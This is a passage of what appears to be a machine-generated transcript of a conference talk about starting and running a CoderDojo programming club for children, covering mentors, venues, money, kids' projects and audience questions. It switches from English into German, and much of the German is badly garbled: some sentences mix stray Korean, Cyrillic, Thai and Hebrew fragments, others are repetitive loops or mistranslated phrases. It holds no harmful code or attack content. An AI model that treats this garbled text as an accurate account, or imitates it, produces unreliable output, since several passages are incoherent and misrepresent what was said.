inspired. They sit there and think, computers are pretty boring, and they are also brought to be just consumers of technology. They just use programs, but they don't create new things. They just use software. And we want to inspire them to do their own thing with computers, whatever that might be. We have some kids that prefer to do 3D modeling, and that's also cool. We want to support them in that. Most of the time, they want to do games with those 3D models, that they just created, and we try to help them as well. But we are not all of us, our 3D programmers. So, it's not always super easy to help them, because they have very high demands. We also want each of them to have fun and to be creative, to create whatever they want to create. Because that's one thing that we said just from the beginning. We don't have a curriculum that you have to go through. In the first lesson, you have to learn HTML, and then JavaScript, and then we don't do that. We ask the kids, what do you want to do here? And because we think that this will inspire their creativity, and they often see what other kids are doing, and say, I want to do that as well. In the next dojo, they have all their ideas, and most of them are a little bit out of our reach. And we try to scale it down a little bit, to try to get it done somehow. And one goal that we have is to replace ourselves. We want to replace ourselves with the kids from the first generation. So they should teach the next generation. This is a goal we have not reached yet. So let's see if we will ever reach it. Maybe I will still do this when I am 80 years old, but that's okay as well. So another thing that you need are coaches. Because without coaches, you can't teach the kids. You can also do that all on your own, but I think this will soon be a scaling problem. But how do you find coaches? I think you should look into user groups. If you are attending a user group regularly, that's very easy. Just give a lightning talk. I want to do a dojo. Who wants to teach? And there will be at least one person who wants to help. If you are not going to a user group, you should start going to user groups, and get to know other people. Because they really want to do that as well. You can also see that there are quite a few people here. There might be other people here who are also interested in doing a Kolder Dojo. Another thing is, if you are working in a tech company, then you could ask your colleagues, do you want to do a Kolder Dojo? Or if you are studying at university, you might ask the other people who are studying with you, do you want to help me? And I found this to be quite an easy process to find people who want to help. You have to get a lot of confidence into the people. If they say, I will come to the next dojo, they will really come. This is the process that takes a little bit of time. Otherwise you don't know how many kids you can take into your dojo. Because you don't know if there are 10 mentors who say they will come, but only 5 come. So you have a problem now. This is what takes a little bit of time. But you will get to know which mentors come when they say they come. Another trick to find mentors is to ask people here. You are at a conference, there are a lot of programmers here. You might meet people from the city you are living in. And they might want to do this thing with you. So an excellent chance to do that would be in this room. Or later at the socializing event. Maybe you meet people there who are interested. So, will you somehow moderate it? Because now somebody should ask, okay, does somebody from this in here? I will repeat the question. The question was, if I will moderate that and try to connect you, yes, at the end of the talk. I will do that. Okay. Then there is the question, how do I find a location? And first you think, this will be super hard. I don't have money to buy a room or something. But this is super simple. You go to your boss and you ask, can I use our office at Saturdays, where nobody is working here? And the boss will say, yeah, of course. And then you have a room. This is at least true, if you are not working in a big enterprise setting, where there are security things going on. But if it's a smaller company, I'm confident that this will work. Another thing that a lot of doger's do is talking to schools. Schools are always interested in doing something with tech. But this is a little bit harder, if you want to do it on a weekend, because schools are closed on the weekend. So you have to find someone who will open the school and close it again and be responsible for everything that breaks. So this is not super simple. But I know a few doger's that do that. And they do that, it works quite well. Another way to do it is to go to a hacker space or a maker space, because they accept user groups and things like that. So they will probably also accept a coder doger. There are a lot of different ways to do that. For me it was really simple. I asked my boss at the time, can I use it? And he said yes, because he thought that it was a good cause to support that. And since then we asked other mentors, is your boss willing to let us do the doger at your place? And this works quite well. And another one that came to my mind are libraries. Libraries are also very well equipped for this task. Because a lot of libraries nowadays, they have a computer room or a maker space room, where they have 3D printers and stuff like that. And they love to get people into the library and do interactive things there, not just reading books. So this is also a good way to cooperate. So we have this every year with the library in Cologne. And it works very well. It is just that we have to move the time slot around, because of closing hours of the library and stuff like that. But you will figure it out. And then you have to find attendees. In our first dojoes, we just asked the mentors to ask kids that they know if they want to come. So they said the big advantage that the mentors mainly talked to kids that they already knew. So they felt more confident for their first dojoes, when they were teaching. And from that point on, it was mainly word of mouth. So those kids said, I was at this cool dojo. Do you want to come with me to the next dojo? And then maybe it was a mistake, I don't know. So in der Zeit, wir haben uns zwei Interviews an die localen Radioszene gegeben. Und dann haben wir die Kinder, die wollen, mit denen wir dojoes kommen. Wir haben mehr Kinder, die wollen, zu kommen, als wir sie akzeptieren. Vielleicht ist das nicht das beste Idee. Wenn du genug Kinder mitgebracht hast, dann ist das eine gute Idee. Und das nächste Fokus-Newspaper ist called Känguru, das akzeptiert Events für die Familie, Events für die Kinder, in die Katalog, und präsentiert sie zu Familien. Und sie haben auch ein bisschen über uns geblieben. Und das hat auch ein paar Kinder, die nicht über das dojoe wissen. So, an diesem Punkt, ja, ich habe einen Moment. Wir haben mehr Kinder, die sich zu jeder dojoe kommen wollen, als wir sie handeln können. So, das Problem ist für uns jetzt so. Aber nicht frustriert, wenn du startest. Als wir starteten, hatten wir in den meisten dojos, wir hatten drei Kinder. Und wir hatten nur zwei Kinder. Aber über den Zeit, das ging fast und fast, in einem dojoe, wir hatten 25 Kinder. Und das war ein sehr, sehr interessantes dojoe. Wir hatten viel zu tun, es war sehr laut in der Ruhe, weil alle so erfreit waren. Es waren auch viele dojos, mit 50 oder 100 Leuten, aber das ist nicht das dojoe, das ich wollen, weil ich ein bisschen von dem, ich will, dass alle in der Ruhe wissen, und dass sie sehen, was alle tun. Wenn du esничumsierst, dann Basis noch nach sectien получилось. Also, dann tust du es einmal einmal. Ich und meine Kinder. Das war ein big grab. Das war auch lernen nach D unity54 ein 2018 ausge martial arts KMiss MLCH 그걸 konzentrierenfecture. Es war unser für junge Menschen etwas in der Freitage zu machen, weil dann ein automatisches Audienz ist. Ich bin das wiedergeheben und du schaust mir, das ist ein guter Punkt. Das ist das, was ich gesagt habe. In der Location. Das ist ein sehr guter Punkt. Ich denke, dass du auch Kinder, die du nicht normalerweise nicht erreichen kannst. Das ist ein sehr guter Punkt. Ich verstehe. Ja. Du hast den Rettel im Win-Spring. Was machen wir? Was wir tun, ich werde das in der nächsten Sitzung antworten. Okay. Unsere Rezept für den Kododojo ist, dass wir einen Monat und einen Sattelday treffen. Wir treffen von 1 Uhr bis 5 Uhr auf den normalen Dojo. Wenn wir etwas Speziales haben, dann gibt es manchmal Zeitverluste. Wir haben es für den Sattelday entschieden, wenn wir das in der Sitzung machen. Viele Coacher sagen, dass ich einen schweren Tag habe. Ich möchte nicht mehr Programmieren. Ich möchte jetzt schlafen. Dann gibt es Leute, die den Dojo auf einem sehr kurzen Notiz skipen. Viele Kinder preferen das, weil sie zu Hause oder etwas machen müssen. Sattelday funktioniert sehr schnell. Aber einige Dojos machen das auch in der Sitzung. Die machen aber meistens ein kleiner Dojo. Es ist die Abendstelle in der Arbeit. Wir fokussieren, unser ähnliche Grupp ist von 5 bis 15. Aber der Korre Grupp ist von 8 bis 15. Der jüngste Anwalt, den wir hatten, ist 5 Jahre alt. Ich werde später zeigen, was sie auf dem Tag gebaut haben. Wir werden wahrscheinlich mit dieser Nummer gehen, weil wir nicht die Kinder, die in unser Dojo kommen, für einen langen Zeit nicht mehr machen. Wir treffen in verschiedenen Offizionen. Wir haben in der Office angefangen, wo ich gearbeitet habe. Dann haben wir angefangen, andere Offizionen zu gehen. Wir haben einen Mentor für zwei Kinder. Normalerweise, wenn ein Mentor ist ungewöhnlich, dann könnte das ein bisschen verändern. Aber wir haben gefunden, dass es nicht die Schüler oder die Menschen, die trainiert sind, es ist sehr schwer, drei Kinder zu verändern. Es ist super schwer, vier Kinder zu verändern. Denn die Sache ist, dass die Kinder, die da kommen, sehr interessiert sind in der Erleichterung. Wenn du da sitzt und die Frage der Kinder, die anderen drei sind jetzt auf die Bord. Das könnte für dich sehr, sehr stark sein. Wenn du jemanden da sitzt, dann hast du eine Frage, also haben wir das zu den besten Räumen gefunden. Manchmal machen wir auch einen Mentor, aber als wir bei der Kapazität sind, machen wir das nicht. Das ist auch der Trick für deine Frage. Wie machen wir das mit den Laptop? Alle unsere Mentoren bringen einen Laptop. Wir haben zumindest ein Notbuch, für zwei Kinder. Einige Kinder bringen ihren Laptop, und sie können auch das benutzen. Aber wir wollen nicht alle, weil einige Kinder nicht ein Notbuch haben, sondern einige Kinder können nicht ein Notbuch haben. Wir wollen nicht sie aus dem Laptop ausnehmen. Wir wollen, dass die Kinder, wenn sie ein Notbuch haben, dass sie es bringen, weil es leichter ist, dass sie dort arbeiten. Wenn sie ein Laptop haben, ist es etwas, was sie auf der Maschine haben. Sie müssen ein USB-Stick haben, das sie irgendwo aufbauen, und sie müssen wieder auf die Runde gehen. Es ist leichter, wenn sie es einfach noch aufbauen. Aber wir wollen nicht das zuvor ausnehmen. Einige Kinder bringen ihren Laptop, aber nicht alle. Der nächste Thema ist Geld. Alle Kododojos sind frei. Und die Mentors sind nicht bezahlt. Nenachden sind bezahlt. Die Organisierungen sind nicht bezahlt. Das ist eine Foundation. Die Kododojo Foundation ist eine Foundation. Aber das ist für die Konferenz, die Kododojo-Konferenz und so weiter. Aber die Mentors sind nicht bezahlt, und die Kinder werden nicht bezahlt. Wir haben entschieden, dass wir nicht Geld geben, und wir brauchen nicht Geld. Es gibt andere Kododojos, die das anders machen. Es gibt Kododojos in Deutschland, die das Verein haben. Sie haben die Situation, dass die Rundsponsoren eine Entität haben, die sie Geld geben können. Wir haben das nicht gemacht, sondern haben das Geld nicht gemacht. Wir hatten das Problem nicht, und haben nicht das Geld. Es gibt mehr Arbeit, man hat Geld, und man hat das Geld. Wir haben das Geld, und haben das Geld, und das hat man nicht gemacht. Wir haben das Geld. Wir hatten das Geld. Ich sehe heute auch, wie man lebt. Sie sagen, das ist derungsge್명gery. Das alles ist idol ก Videos. évtl. Spendenquitter oder so, die uns einfach Geld geben wollen. Aber wir wollen nicht für das Advertis, weil wir nicht alle für uns Geld geben wollen. Wir sehen das nicht als eine gute Sache. Aber die Leute wollen nur das machen und wir wollen Pizza. Okay, eine andere Sache, die... Was ist das System, das du dir an die Mentos verabschiedest? Was soll ich dir an die Mentos verabschieden? Das System ist mir. Ich stehe in der Front und frage, was du tun willst. Dann weiß ich, was jeder der Mentos weiß. Dann sende ich sie dort. Das ist mein System. Ich denke, das wird nicht auf 50 Mentos und 100 Kinder verabschieden. Aber für unsere Größe funktioniert das sehr gut. Wenn ich eine neue Mentor bin, frage ich sie immer, ob du webprogrammieren möchtest oder was anderes. Und manchmal schalte ich immer die Mentor an. Du weißt Minecraft, oder? Du kannst das tun. Ja, das ist das System. Okay, das nächste... Oh, ja. Was ist das für die Magen? Magen oder Magen? Die meisten von den Firmen, die wir arbeiten, haben Trinkungen. Es gibt viele, die dafür haben wollen, und die haben mehr Geld, die anderen können auch trinken. Das funktioniert sehr gut. Die Mentor dann kann nicht nur from school as possible. So, one of the things I already said is we want the kids to choose what they want to do. We don't force them to now learn Java or something. We want them to ask us, hey, I want to do a website. What do I need to learn for that? And we want to help them do that. Also, you can stop at any time. As a kid, you can say, I don't want to do anything anymore. Most of them start playing Minecraft. At some point, they come back. And that's okay, because it's Saturday. It's your free time. And if you want to play some Minecraft, that's totally okay. Also, the mentor can now concentrate on the other kid. So, this sometimes also helps the mentors. So, there's no schedule. There's no, like, you have to... Now, it's time to get back to the computer. We don't do that. But most of the kids are... It's more difficult to send them back home when the dojo is over. And this is not a huge problem. And some mentors also force breaks. So, after two hours, they say, like, let's do a little break and walk a little, because, yeah, there's so much to do and so much excitement. So, what can one do at a dojo? You can do a lot of different things at a dojo. Here are some examples that we are doing at our dojo. And there are infinite possibilities to do things at your dojo. One very cool thing is doing websites. Websites are something every kid knows, because everyone is on the Internet all the time and sees websites. And this is something that a lot of kids ask on their first time when they come, like, I want to build a website. Or I want to build an app. That's also something some kids ask. But websites is still one of the most popular things. This is an example of a homepage that one of the kids has built. It's very colorful. And all the colors are handpicked by the children. And one of the things that is really, really cool, like, if a kid comes there for the first time and doesn't really know what to do, he can tell them, what's your favorite website? And then we go into the web inspector, do a right click, and let the kid change the colors of the website. And you cannot imagine how much excitement this caused. I go to the school website, and now it's not ugly anymore, because it has much cooler colors. And then we have to tell them that they have only edited their local version and nobody else sees it. But they can still save it and show it to other people. So, that's pretty cool. But a lot of kids want to create either a homepage or a page about something they're excited about. So, this is the homepage of Leo. He's also in the audience. He has a webpage where he also demonstrates, like, what have I done already, and something. This is lab code. But I will show you a longer demo later on about one of the apps that you can see here. So, if you have a page about the favorite books of one of the kids, and they also give ratings. And if you click on one of the links, you will see a long description of the book, what is very exciting about the book. Yeah. And this here is not very good to see. This is a website about the favorite game of one of the kids. It's called R-something. And it describes all the creatures in the game. I don't know this game, but yeah. It apparently has a lot of information, because I clicked through it, and there were a lot of subpages. And this here is a page about animals. This was our youngest Kododojo attendee. I asked her, like, what do you want to do? And she said, I want to do a website about my favorite animals. So, we sat down, and all we did was googling for images, and then putting it into the markup. And all that is good quiet here is that you know what an H1 tag is, and what an image tag is. And you can make a child very happy. This website is still up, and is still shown to friends and families of this kid, because she's so excited about this website. This is also one thing that I will come back to later, but you will never guess what will excite one kid. Like, every kid is excited about something entirely different. And some kid will see this and will be super happy. And it will ask you to put more seals on this page, because seals are so cute. And this page will grow and grow and grow and grow. This is a very simple way to bring someone into creating things, because you have created a collage of your favorite images. I know there's a copyright issue. Don't worry about it. It's a website from a kid who will sue a kid. Then one thing that is also pretty exciting is robots. We haven't done this in a while, because we used mindstorms. Sorry, mindstorms for that. I already forgot the name, because it's so long ago. But the person who owns the mindstorms is no longer in the dojo, so we don't have the mindstorms anymore. But we built robots that played soccer, and that was very exciting. The thing that was really cool about the robots was, because they built using Lego, the kids that were very young and were not interested in programming, they could concentrate on building the coolest robot, and the other kids could concentrate on building the robot. So there was a dynamic in the group between the younger kids and the older kids. And there were also requirement engineering learnings there, because the other kids said it needs some legs to walk. And the other kids were so excited that they built a crown or something. Yeah, robots. So another thing that we're doing at our dojo is electronics. Most of electronics means some blinking lights. A lot of blinking lights, because blinking lights are the best. So, I will show you two short demonstrations. The first one here is the Ampel. I don't know the word, sorry. So someone wants to cross the street and press on the button. So, now it's green and it's red for the cars, and it will also go back and it will change. So now you can cross the street again. You can cross the street again and the cars can continue. This was a project that they also continued in the dojo app, in the next dojo, and made it even more fancy with detection of your finger when you came next to it, and light detection. But it was also also quite fancy, but it's not so easy to demonstrate in a video. Where's the other one? Oh, okay. I forgot the other one, sorry. There was another one, for if you came close with a finger, the lights would go bright. And if you move the finger far further away, it would change the color. und eine Sache, die auch wirklich sehr gut ist, wenn du Kinder in der Dojo hast, die einen Schraublauch machen, kann auch eine Schraube kontrollieren, wie wir sie wissen. Also kann man die Programmierung von Elektronik machen. Und das ist etwas, das die Kinder lieben, weil die Kinder, die in der Dojo kommen, sie haben auch schon keinen Schraublauch, und sie können mit dieser Knowledge weitergehen. Mein Graf, alle Kinder in der Dojo lieben Minecraft, und das hat sie auch. Und so, für einen langen Zeit, haben wir gedacht, wir wollen die Kinder, die Minecraft programmieren, weil sie sich über Minecraft und Programmierung erinnern, so dass wir das zusammennehmen sollten. Und für einen langen Zeit war das sehr hart, weil die Art, Minecraft-Modern zu machen, ist, dass die Java-Kode, die mit unbekannten API-Kommentationen mit unbekannten, und es ist nicht so cool. Es ist hart für jemanden, der wirklich weiß, wie man programmieren muss. Es ist nicht der beste Weg, jemanden zu programmieren. Aber etwas Wichtiges hat passiert, etwas, was es heißt, Scriptcraft. Scriptcraft ist ein Weg, um ein kleines Dronen in deinem Spiel zu programmieren, mit JavaScript. Und als wir schon viel mit JavaScript benutzen, in unserer Dojo, ist es ein sehr nice Weg, zu machen. Man programmiert ein kleines Dronen, das durch die Welt fliegt, und das kann blockieren, so dass man auch eine Art Struktur bauen kann. Und für viele Kinder war das ich, weil sie wussten, ich kann das selbst machen, aber jetzt kann ich es viel schneller machen, weil ich einen Roboter machen kann. Das ist auch etwas, das wir in der Zukunft haben, wenn Robots alle unsere Jobs nehmen. Das ist ein Lessens für Leben. Das ist etwas, das ihr wissen wollt, das ihr später kommt. Es ist sehr leicht zu beginnen, weil das Scriptcraft-Webseit ist sehr gut. Es ist ein kleines Buch, um Kinder zu lernen, wie man mit diesem Programm programmiert. Es ist sehr cool. Ja. Und das ist auch etwas, was wir auch für die Zeit machen, dass Kinder ihre eigene Gänge schaffen. Weil viele Kinder Gänge lieben, und ein paar unserer Mentors haben auch ein Programm gemacht, und da waren Kinder mit dem Programm das erste Spiel. Das ist etwas, das funktioniert sehr gut. Die Unterschiede zwischen ein Programm zu lernen, heute und 30 Jahre ago, ist, dass Kinder jetzt 3D-Gänge haben und so weiter. Aber wir müssen die Erwartungen für die Beginnung etwas höheren. Wir machen 2D-Gänge, und sie sind noch viel Spaß. Hier sehen wir den basicen Prinzip. Wir haben einen kleinen Menschen, die Starzehr und ein bisschen Tutorial, das wir mit den Kindern machen. Sie können dieses Spiel programmieren, sie können dann starten, wie viel Gravität in dem Spiel ist. Und ein paar Kinder können mit einem Gravität-Settingen spielen, für eine Stunde. Sie werden es nicht problemlos ändern. Sie werden es dann größer und größer, und sagen, ich kann jetzt fliegen. Ich kann fliegen, und sie werden glücklich sein. Sie können nur ein eigenes Programm in einem großen Programm ändern. Das ist alles gut. Einige Kinder wollen mehr kennen, einige Kinder wollen das Spiel machen. Und da ist eine Sache, die uns unsere Kulturer mitgebracht haben, das war die Idee, hey, einfach die Kinder zu schaffen, ihre eigenen Figuren und ihre eigenen Texturen für das Spiel. Und das ist sehr, sehr einfach. Wir lassen sie auf dem Papier drauen, und dann nehmen wir ein Handy und snapen es, dann gehen wir in ein Programm und schneiden es aus, und dann haben wir eine Figur. Und das ist etwas, was die Kinder entzünden. Denn wenn sie das andere Spiel programmieren, haben sie nicht das Gefühl von Ownerschaft. Denn wenn sie die erste Zeit in der Dojo sind, dann verstehen sie, dass sie dieses Spiel ergeben. Sie sehen ein Spiel, aber sie haben nicht den Kontroll über was in dem Spiel ist. Und wenn sie sich das Spiel von ihren eigenen Figuren ergeben, ist das ein eigenes Spiel. Und das ist etwas, was es wirklich gut funktioniert. Und man kann auch einen sehr jungen Kind, wie 7 oder 8 Jahre alt, lernen, zu programmieren, aber sie können sich das eigenes Spiel schaffen. Und sie werden es allen zeigen, und er wird sehr erfreut. So, ein Beispiel hier ist das Spiel, das ist super einfach. Aber die Kinder wollen die Zahl der Starten ergeben. Sie wollen bis zu 10.000, und die 100.000, und die Bräuze ist sehr krass. Aber das ist moderate, ich würde sagen. Aber in diesem Spiel ist das Figur Joda und er fährt Darth Vader. In der Original-Trailung. Also ich würde nur ein kleiner Teil zeigen. Es funktioniert in den selben Weg. Es gibt einfach mehr Stars, aber man kann noch auf die Runde gehen und auf die Runde gehen. Ich habe hier den Video stoppeden, weil es krass ist. Aber das ist okay. Vielleicht. Ja, genau. Okay, so diese sind einige Experienz. Wir haben auch Kinder, die Android-Programmen und andere Dinge. Die Kinder haben schon vorhanden die Knowledge. Sie benutzen ihre Mentoren als eine Helpläne. Sie kommen und sagen, ich verstehe nicht, wie ich zwei Dinge machen kann. Und sie müssen jetzt zur Konkurrenz lernen. Ja, das ist ein sehr anderer App, das Leo hat gebaut. Das ist eine Web-Applikation mit einem Node.js-Bag-End und einem jQuery-Frontend, wo du deine To-Do's verabschiedest. Du kannst oder jemand anderen verabschieden. Und was du hier siehst, ist, das ist eine der Liste in der App. Das ist ein sehr simpler App. Es ist ein sehr simpler System. Du kannst alle Taschen, die du verabschiedest, zwischen den beiden Staten. Jetzt ist es noch zu tun und es ist fertig. Du kannst auch mehr verabschieden. Wenn du die Trash bringen willst, kannst du das Simpel hier wählen, und du kannst jetzt die Trash bringen. Du kannst es einfach ändern. Du kannst es mit anderen Leuten teilen. Du kannst die anderen Leute an die Liste anziehen. Du kannst neue Liste schaffen und andere Liste verabschieden. Und du kannst die To-Do's erlangen. Das ist mit Tablet in der Hand geplant. Denn die Touchtargeten sind groß, so kannst du die Hand mit deinem Finger auf die Hand. Das ist ein Tablet. Das ist ein Beispiel, das wir in Dojo gebaut haben. Das ist nicht in 4 Stunden passiert. Es passiert über viele Dojo und es gibt Nachfolge. Das ist Leo. Er sitzt da. Das war ein klein Demo. Ich kann euch viel mehr zeigen, aber viele Dinge sind auf anderen Leuten Computer. Ich kann es euch zeigen. Das ist eine der Dinge, die ich euch zeigen kann. Um das zu verabschieden, gibt es einige Hinweise für die Mentoren. Der erste Wurzeltest ist, dass man nicht auf die Kabel teilen will. Das ist wahr für die Mentoren. Das ist wahr für die Mentoren. Lass die Leute die Kabel auf ihre eigenen Kabel teilen. Du kannst die Leute die Kabel teilen. Aber nicht die Kabel teilen. Wenn die Leute die Kabel teilen, haben sie die Software geplant. Sie werden viel mehr lernen. Sie werden viel mehr fokussiert. Wenn du sitzt da und teilst, und teilst, und teilst, und teilst, dann wird die Leute einfach nicht mehr auf die Person zu pay attention. Nur nicht die Kabel teilen. Es ist okay, um Details zu skipen. Das ist ein Thema, das die Leute arbeiten. Sie arbeiten mit einem 8-Jährigen. Sie arbeiten mit einem 8-Jährigen. Sie haben das erste Wettbewerb. Sie verstehen nicht, was eine Funktion ist. Sie können ein Funktion passen. Sie haben das Funktion nicht. Sie skipen die Details. Sie konzentrieren die Dinge, die für diese Kinder und Kinder mit dem Spaß sind. Das ist... Sie wollen sie inspirieren. Wenn sie in der Entdeckung wollen, müssen sie mehr lernen, später auf ihre eigenen. Aber sie wollen sie inspirieren, und sie wollen die Fragen antworten. Aber nicht in die philosophischen Dinge, die sie testen. Es ist... Sie wollen sie nicht in Produktion gehen. Das ist... Ja. Okay, vielleicht. Ein weiterer Thema, was ich ganz klar sagte, ist, dass es gar nichts ist. Das Programm ist hart. Wenn du ein Programm für lange Zeit machst, denkst du, das ist hart. Das ist nicht hart. Wenn du es für den ersten Mal machen, ist es hart. Wenn jemand dir sagt, es ist hart, oder du sagst, es ist hart, dass sie nicht noch versteckt werden. Du willst dir sagen, du wirst nicht affiniert, aber das ist etwas anders. Wenn du sagst, es ist hart, dann kannst du das nicht verstehen. Also, bitte, nicht sagen, es ist leicht. Sonst sagen sie, ich werde dir das erklären, oder nicht zufrieden von dem, oder durch das, in einer langen Zeit. Und wie ich gesagt habe, du wirst nie wissen, was die Kinder anstrengen. Ich hätte nicht erwartet, dass einige Kinder mit Gravitie-Setzungen für eine Stunde spielen. Ich hätte nicht erwartet, aber es passiert. Ich würde mich nicht sagen, dass das super cool ist. Du denkst, dass etwas cool ist, dass das etwas, das die Kinder finden, cool ist. Wenn du super erfreut, um Funktionsprogramme zu machen, vielleicht ist das nicht. Weil sie wollen, dass sie Scheiße machen. Also, bitte, das in der Mitte. Und finally, ich möchte dir etwas sagen. Ich möchte mich bedanken, für die Startung der Dojo. Sie fragte mich in der Beginn, dass ich das Ding, ich habe nie gehört, den Dojo zu kümmern. Ich war super erfreut, für meine ersten drei Dojos zu lernen. Und ohne sie, ich hätte nicht das Dojo gemacht. Danke, zu Ellie, die nicht hier ist, aber trotzdem danke. Danke an alle Mentoren, weil ohne sie, das würde nicht funktionieren. Wir haben jetzt jetzt 15 Mentoren. Ich denke, das ist superamulant. Weil sie es, um Kinder zu lernen, und ich bin froh, dass alle sie sind. Dann zu den Firmen, die uns die Ruhe nutzen, das ist supercool. Und natürlich auch zu den Kindern, weil ohne sie, das würde nicht so viel Spaß sein. Also, das ist der Ende meiner Rede. Wir haben jetzt eine kleine Diskussion. Danke für die Begründung. Wir gehen jetzt zur Diskussion. Wir beginnen mit Fragen, und dann werde ich mit der Frage, wer die Dojo startet, die Leute zu konzentrieren. Was sind die Vorkürzen? Ist es noch mehr als ein Budget? Eine Rufraub-Poketion? Oder vielleicht ein paar andere Organisationen, die du joinst? Was sind die wirkliche Probleme? Okay. Ich bin nicht sicher, ob ich das verstanden habe. Die Vorkürzen, um was zu machen. Um die Stabilität zu machen. Okay, also, das Hauptsache, um eine Dojo zu machen, ist, immer zu finden, ein Rhythmus in eurem Dojo. Wenn du sagst, dann dass du dann nocharen Ich möchte euch eine Kooperation mit Sportvereinen, also mit Klub. Sie haben regelmässige Trainingen, jeden Tag oder zwei Tage in der Woche. Wir können das kombinieren. Viele Kinder fragen uns, ob ich es lernen muss, ob ich es lernen muss. Sie starten natürlich mit dem Website. Sie wollen ein eigenes Website haben. Die anderen Dinge können wir starten. Wir haben das mit der Python Camp gemacht. Das war nur ein Jahr lang. Wir haben das auch in der Schule gemacht, aber auch im Verein. Sie wissen es. Sie sind mit diesem Familiar. Wir haben die Mentors da. Das Projekt ist die Integration der Sport- und Bildung. Wir wollen auch ein paar Kodens, Programmen und so weiter. Das ist ein Das ist ein sehr guter Idee. Ich denke, das ist ein similarlyes Idee, um Jugendklubs zu fragen. Denn man kann sich dort nach einem Ort, wo schon Kinder sind, und wenn sie in diesem Raum interessieren, ist das eine sehr gute Idee. Wir müssen später reden. Danke. Das ist eine Frage da. Ich denke, du musst die Mikrofon benutzen. Ja, die Räume. Ich bin ein Mentor in Gänt, der Kododojo in Gänt. Wir hatten das gleiche Problem mit vielen Kindern, dass wir fünfmal mehr Kinder hatten, als wir eine Räume eigentlich hätten. Was wir gemacht haben, war, weil wir das erste und erste Service-Basen hatten, dass die Eltern, die auch Mentors waren, die Kinder, die schon aufgenommen haben, um mehr Mentors zu haben. Mit mehr Mentors können wir auch mehr Kododojo geben. Wir haben jetzt zwei Kododojo jedes Monat. Es ist ein bisschen anders, weil wir einen Mentor für zwei Kinder haben. Wir haben oft fünf Kinder für einen Mentor. Wir haben versucht, Kinder zu helfen. Wenn sie eine Frage fragen, dann haben sie die Hände aufgenommen. Wir haben sie nicht die Antwort geben. Wir haben sie aufgenommen, aber wenn wir das auch schon verabschiedet haben, können Kinder manchmal auch viel besser erklären, als wir sie haben. Wir haben die Technik, die wir benutzen, die sie nicht verstehen können, und die sie nicht sagen. Das hilft, um mehr Mentors zu haben. Aber trotzdem musst du sie beitragen, weil wir uns nicht fragen, ob andere Kinder sind. Du musst noch auf die Seite gehen und fragen, ob jemand stürzt. Aber das ist eine Art Weg, um mehr Kododojo zu haben. Ein weiterer Hintern, das wir auch mit Mentors geben, ist, dass du nicht alles beitragen, sondern dass du alles beitragen. Es ist oft eine Reise für Kinder, dass sie helfen, und du weißt nicht, dass du nur noch ein Mentor beitragen. Auch wenn du das wissen kannst, oder du noch ein Kind beitragen kannst, das schon verabschiedet hat, weil niemand alles weiß. Das ist was, was wir wollen. Wir lassen uns auch oft nur Google zusammen, um das zu machen, dass wir das nicht wissen. Das ist das, was ich gerne sagen möchte. Mehr Fragen oder Kommentare? Ja, du kannst einfach noch weiter. Ein Mikrofon. Ich werde es noch halten. Ein weiterer Hintern, das war etwas, was wir mit Kododojo machen. In den letzten 20 Minuten haben wir eine Demonstration. Wir haben einen Beamer, ist etwa 2000-itivem GRA, deins mit der Einführung des Stefans. Wir haben dann mit uns Logic eng gefordert, miteinander mit Daschoren und alarmd曲ab Mortg Kubo, weiter Wir hatten das Problem, dass in den beiden Offizien, die wir hier waren, sie nicht ein Bimmer haben. Wir hatten eine Demonstration, ein bisschen mehr kautisch. Aber ich glaube, dass es sehr hilft, weil auf der einen Seite es die Kinder, die sie präsentieren, weil sie für was sie gemacht haben, bekommen. Auf der anderen Seite ist es auch eine Inspiration für was ihr auf der nächsten Dojo könnt. Weil ihr schon kennt, dass es jemanden ist, der dir das tut. Das ist etwas, was für uns auch sehr gut funktioniert. Wir haben auch eine Introduction gemacht, wo alle die Namen sagen. Aber die Kinder haben das nicht wirklich so gefangen. Wir haben es stoppedpt. Ich habe eine Frage. Wenn die Mentoren ihren eigenen Laptop bringen, solltest du ein paar Toolset, die sie bringen sollen, damit die Kinder starten können. So dass sie sich leichter starten können, das bedeutet, dass sie sich auf ihrem Website schreiben wollen. Sie wollen wahrscheinlich erst die VI lernen. Ja, das ist wahr. Die VI ist wahrscheinlich nicht der beste Editor, der startet. Wir machen zwei verschiedene Dinge. Wir benutzen die Online-IDE Cloud9. Es hat einen großen Vorteil, dass, wenn du auf dem Computer des Mentors arbeiten und die Kinder wollen, dass sie zu Hause arbeiten, alles, was du tun musst, ist, dass du einen Lock-in machst. Sie können einfach zu Hause locken und haben das gleiche Ding. Sie haben das gleiche Umgebiet und können auf dem anderen ist eine Live Prevyo-TLSC-Funktion. Wir hetzen einfach nur wo sie die PhLCD confirmation gibt. Wirכל地 diese Kevin Mac. Wenn die Kinder das Android pickuptekहen, Daniel wird es öfter arbeiten, das und die Zivilisten und so weiter. Das ist ein sehr gutes Ding. Das ist nur, dass wenn du in einem Office bist, wo der Wi-Fi nicht super stabil ist, das wird nicht die beste Erfahrung sein, weil es eine stabile Konnexion zu arbeiten muss. Das andere Setup, das wir benutzen, ist Atom. Denn Atom ist für frei. Du kannst diesen Text-Elektron installieren. Es ist leicht zu nutzen. Wenn du das nicht benutzen willst, kann man es später installieren. Aber wir benutzen nur das, was der Mentor mag. Aber meistens nicht Wim, nicht Emacs und keine Ideen. Ja, das ist das Ding. Hallo, ich bin der Organisator der Munich Kododojo. Wir benutzen die Leitbott-Signal-Signal-Signal, um die Idee zu geben, wie ich die Programme mit dem Internet und den Internet aufbaut. Das ist ein sehr cooles Ding. Wir benutzen das Leitbott. Wir benutzen das Leitbott, weil wir auch den Kod da ablaufen können. Sie können auch die Computer aufbauen. Wir benutzen das Codeorg, wo wir die HTML, CSS und JavaScript zusammenbauen. Wir haben viele andere Links. Wir haben viele andere Links. Ich stopfe die Frage und Ansage. Ich habe die Frage, wer mit dem Kododojo etwas tun will, aber nicht noch. Du kannst deine Hand rausholen. Woher bist du? Perfekt, hier ist der Codeorg und der Bohn. Ich kann dir Kontaktdaten geben. Hallo! Ich weiß jemanden. Du solltest mich sprechen. Du? Ich weiß ein Mann. Ja? Zürich. Zürich. Sorry. Ich habe eine deutsche Stadt geplant und ich habe es nicht verstanden. Ich glaube, in Englisch ist es Zürich. Was ist das? Okay, jemand hier von Zürich? Sonst kennt jemand jemanden von Zürich? Sorry. Aber du kannst starten. Du siehst alles, was du brauchst. Es gibt eine offizielle Codeorg Website, wo du einen Link finden kannst. Ja, es ist Zen. Zen.Codododjo.com ist die Website für die Kododojo-Searchen. Sie können einen da finden und Kontakt finden. Sie werden wahrscheinlich mehr Mentors liefern. Okay, cool. Ich bin gespannt, was in 